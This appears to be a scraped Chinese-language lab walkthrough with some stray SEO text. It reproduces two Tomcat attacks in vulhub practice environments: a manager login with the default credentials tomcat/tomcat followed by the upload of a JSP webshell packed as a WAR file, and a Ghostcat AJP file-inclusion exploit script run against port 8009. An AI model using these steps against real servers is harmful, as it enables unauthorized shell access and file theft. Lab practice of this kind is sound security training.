网站建设引流刘贺稳1,wordpress必备,中国空间站叫什么名,软件开发专业实习报告文章目录 弱口令启动环境漏洞复现 本地文件包含启动环境漏洞复现 弱口令
启动环境
来到vulhub/tomcat/tomcat8/靶场
cd vulhub/tomcat/tomcat8/安装环境并启动#xff1a;
sudo docker-compose up -d sudo docker-compose up -d修改端口后启动#xff1a;
su… 文章目录 弱口令启动环境漏洞复现 本地文件包含启动环境漏洞复现 弱口令
启动环境
来到vulhub/tomcat/tomcat8/靶场
cd vulhub/tomcat/tomcat8/安装环境并启动
sudo docker-compose up -d sudo docker-compose up -d修改端口后启动
sudo docker-compose -f docker-compose.me.yml up -d打开环境 漏洞复现
点击Tomcat主页的manager APP登录这里有弱口令漏洞输入用户名Tomcat密码Tomcat即可登录成功 登录后可以上传war文件在这里上传打包成war文件的大马可以getshell 到目录下
cd /tools/webshell/jsp使用命令
cvf jshell.war jshell.jsp将jshell.jsp文件打包成war文件上传上传后生成路径表示上传成功 访问大马文件 点击系统命令在这里执行命令发现是root用户相当于获取到了webshell 本地文件包含
启动环境
来到vulhub/tomcat/CVE-2020-1938靶场
cd vulhub/tomcat/CVE-2020-1938 安装环境并启动
sudo docker-compose up -d sudo docker-compose up -d修改端口 修改端口后启动
sudo docker-compose -f docker-compose.me.yml up -d在浏览器输入10.9.75.45:8085打开主页 漏洞复现
这个主页有一个文件包含漏洞到/tools/apache-tomcat/CNVD-2020-10487-Tomcat-Ajp-lfi目录下
cd /tools/apache-tomcat/CNVD-2020-10487-Tomcat-Ajp-lfi从之前的配置文件看到8009端口开放执行命令
python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 10.9.75.45 -p 8009 -f WEB-INF/web.xml利用文件包含漏洞读取到该网站下的web.xml文件的内容
